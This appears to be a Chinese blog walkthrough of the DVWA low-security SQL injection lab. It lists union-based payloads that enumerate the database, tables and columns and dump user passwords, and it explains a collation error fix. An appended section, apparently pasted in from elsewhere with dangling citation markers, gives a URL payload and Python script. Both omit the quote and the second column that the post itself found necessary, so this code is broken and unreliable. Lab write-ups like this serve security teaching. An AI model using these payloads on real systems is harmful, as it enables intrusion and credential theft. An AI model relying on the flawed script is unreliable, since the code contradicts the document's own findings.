【网络安全】DVWA之SQL注入—low level解题详析

本文介绍了如何判断SQL注入漏洞的类型,如数字型和字符型,并展示了如何确定注入点的数量。接着,文章详细讲解了如何通过注入技巧来爆库名、当前用户名、表名、列名以及字段。在遇到非法字符混合错误时,给出了调整数据库排序规则的解决策略。

判断漏洞类型

判断漏洞类型原理可参考[网络安全]SQL注入原理及常见攻击方法简析

  • 判断是否为数字型注入

在这里插入图片描述在这里插入图片描述
若为数字型注入,则第二个语句应回显Error或没有回显。

  • 判断是否为字符型注入
    在这里插入图片描述在这里插入图片描述

第二个语句没有回显,所以该漏洞类型为字符型注入漏洞。


判断注入点个数

输入1' order by 4#时,回显Unknown column '4' in 'order clause'
说明猜测的注入点个数过大
输入1' order by 2#时,回显如下:
在这里插入图片描述说明注入点个数为2或3
输入1' order by 3#时,回显Unknown column '3' in 'order clause'
所以注入点个数为两个


爆库名

输入1' union select 1,database()#
回显一个数据库名

在这里插入图片描述图片中第一段为第一个注入点的信息,第二段为第二个注入点(即database)的信息。


爆当前用户名

输入1' union select 1,user()#
在这里插入图片描述
由于注入点有两个,所以我们可以通过一个sql语句既查询数据库名又查询当前用户名
输入1' union select user(),database()#

在这里插入图片描述
注意,如果使用1' union select user()#的话,会回显The used SELECT statements have a different number of columns(所使用的 SELECT 语句具有不同数量的列),因为该语句的注入点只有一个。


爆表名

输入1' union select 1,table_name from information_schema.tables where table_schema='dvwa'#
回显guestbook和users两个表名

在这里插入图片描述
也可采用如下语句
1' union select 1,group_concat(table_name) from information_schema.tables where table_schema='dvwa'#

在这里插入图片描述
其中,group_concat的作用是将多个值连接成一个字符串,并用逗号连接。


爆列名

输入1' union select 1, column_name from information_schema.columns where table_name='users'#

在这里插入图片描述
1' union select 1, group_concat(column_name) from information_schema.columns where table_name='users'#

在这里插入图片描述
相比之下,在查询结果过多的情况下,建议使用group_concat将查询结果集合起来


爆字段

输入1' union select user,password from users#

在这里插入图片描述


报错分析及解决方法

若SQL联合注入过程中出现该报错:illegal mix of collations for operation UNION
原因如下:information_schema里的table的排序规则是utf8_general_ci,而user表中字段默认为utf8_unicode_ci,导致字符排序不匹配。
解决方法:

1.在phpstudy中打开phpMyAdmin

在这里插入图片描述

2.进入dvwa数据库中的user表,将各列排序规则修改为utf8_gengeral_ci,保存即可。
在这里插入图片描述

### 获取 DVWA SQL 注入 Low 别的当前数据库名称 在 DVWASQL 注入模式下,由于安全防护较低,可以直接利用简单的 SQL 查询语句来提取目标数据。为了获取当前使用的数据库名称,可以使用 `UNION SELECT` 技术结合 MySQL 内置的 `DATABASE()` 函数实现这一目的。 以下是具体的操作方式: 1. **构造查询字符串** 利用 `UNION SELECT` 将注入点的数据替换为目标数据。假设输入框中的参数名为 `id`,可以通过以下 URL 构造请求: ``` http://<DVWA_IP>/vulnerabilities/sqli/?id=1 UNION SELECT DATABASE()&Submit=Submit# ``` 这里的核心部分是 `UNION SELECT DATABASE()`,它会返回当前正在使用的数据库名[^1]。 2. **验证结果** 提交上述 URL 后,在页面显示的结果中可以看到一个字段被替换成实际的数据库名称。通常情况下,默认的数据库名称为 `dvwa`。 3. **注意事项** - 在 Low 别下,单引号未被转义或过滤,因此可以直接执行上述操作。 - 如果遇到其他别的安全性设置(如 Medium 或 High),可能需要额外处理特殊字符或采用盲注技术[^2]。 #### 示例代码 如果希望通过脚本自动化完成此过程,可参考如下 Python 脚本: ```python import requests url = "http://<DVWA_IP>/vulnerabilities/sqli/" payload = "?id=1 UNION SELECT DATABASE()" cookies = { "PHPSESSID": "<SESSION_ID>", "security": "low" } response = requests.get(url + payload, cookies=cookies) if response.status_code == 200 and "dvwa" in response.text: print(f"Current Database Name: {response.text.split('<pre>')[1].split('</pre>')[0]}") else: print("Failed to retrieve the database name.") ``` 该脚本发送带有注入负载的 GET 请求,并解响应内容以提取数据库名称。 --- ###
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

秋说

感谢打赏

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值